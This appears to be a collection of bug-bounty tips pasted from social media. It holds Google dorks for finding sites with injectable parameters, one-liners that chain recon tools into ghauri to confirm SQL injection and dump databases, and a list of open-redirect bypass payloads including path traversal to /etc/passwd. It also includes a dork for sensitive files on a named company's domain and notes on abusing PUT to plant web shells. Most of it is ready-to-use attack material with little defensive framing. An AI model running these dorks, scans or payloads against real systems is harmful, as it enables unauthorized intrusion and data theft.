⚡️Google Dorks - Vulnerable Parameters ⚡️


⛔️XSS prone parameters:

inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com

⛔️Open Redirect prone parameters

inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com

⛔️SQLi Prone Parameters

inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com

⛔️SSRF Prone Parameters

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain=  | inurl:page= inurl:& site:example[.]com

⛔️LFI Prone Parameters

inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com

⛔️RCE Prone Parameters

inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read=  | inurl:ping= inurl:& site:example[.]com

🔆 Credit- Mike Takashi

subfinder -d example.com -all -silent | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

echo example.com | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

subfinder -d vulnweb.com -all -silent | gau -t 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

echo "test.vulnweb.com" | gau -t 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

Hi...new video come in....

r u ready...

Easy way to find wordpress file upload Vulnerability | bug bounty 🔥
https://youtu.be/VUMATF8QmVA

these writups will help you must read in free time ❤️ [Portswigger labs+medium writups+h1 reports] you are good to go.. https://www.bugbountyhunting.com/

After recon, i found two bugs, so i will give a video on it he said

2 Critical Bugs Found! | Live Bug Bounty Hunting on Bugcrowd | Live Recon 🔥

https://youtu.be/qR0ez9xZr_8?si=wzpcvOZpurQlhYXz

🪲How I stay updated with CVEs?

curl https://cvedb[.]shodan[.]io/cves | jq | grep "cve_id"

try this google dork to find senstive files on website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

you can try this effective manual openredirect Bypass:

1. Null-byte injection:
   - /google.com%00/
   - //google.com%00
 
2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/
 
3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/

4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com

5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/

6. Alternative domain notations:
   - //[email protected]/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)

7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//

8. Octal IP address format:
   - https://0177.0.0.1/
   - https://00177.0000.0000.0001/

9. IP address variants:
   - https://3232235777 (decimal notation of an IP)
   - https://0xC0A80001 (hex notation of IP)
   - https://192.168.1.1/

10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe

11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com

12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/

13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/

14. IPv6 notation:
    - https://[::1]/
    - https://[::ffff:192.168.1.1]/
   
15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com

16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd

17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/

18. Non-standard ports:
    - https://google.com:81/
    - https://google.com:444/

19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/

20. Query parameters obfuscation:
    - //google.com/?q=https://another-site.com/
    - //google.com/?redirect=https://google.com/

21. Using @ symbol for userinfo:
    - https://admin:[email protected]/
    - https://@google.com

22. Combination of userinfo and traversal:
    - https://admin:[email protected]/../../etc/passwd

always check endpoints

Triaged P1 and huge impact

hashtag#bugbountytip
check all the time allowed HTTP method
====>

Using HTTP method PUT
==>
Attacker can create or modify files in this directory without providing any type of authentication.
==>
Attacker may can create Web Shell in this directory And open Backdoor and Run RCE

Using HTTP method DELETE
==>
Attacker can Delete any file on that directory and that
sometime Lead to Take Down The Host

Nest.js with ssrf...coming soon

How to Find SSRF Vulnerabilities in Next.js | Bug Bounty Hunting POC
https://youtu.be/80MF5blHO6w?si=21o4mwRlSjt5pMxg

// Query //
en.fofa.info : body="/_next/static" && title="Next.js"
publicwww : body="/_next/static" title="Next.js"
shodan : body:"/_next/static" title:"Next.js"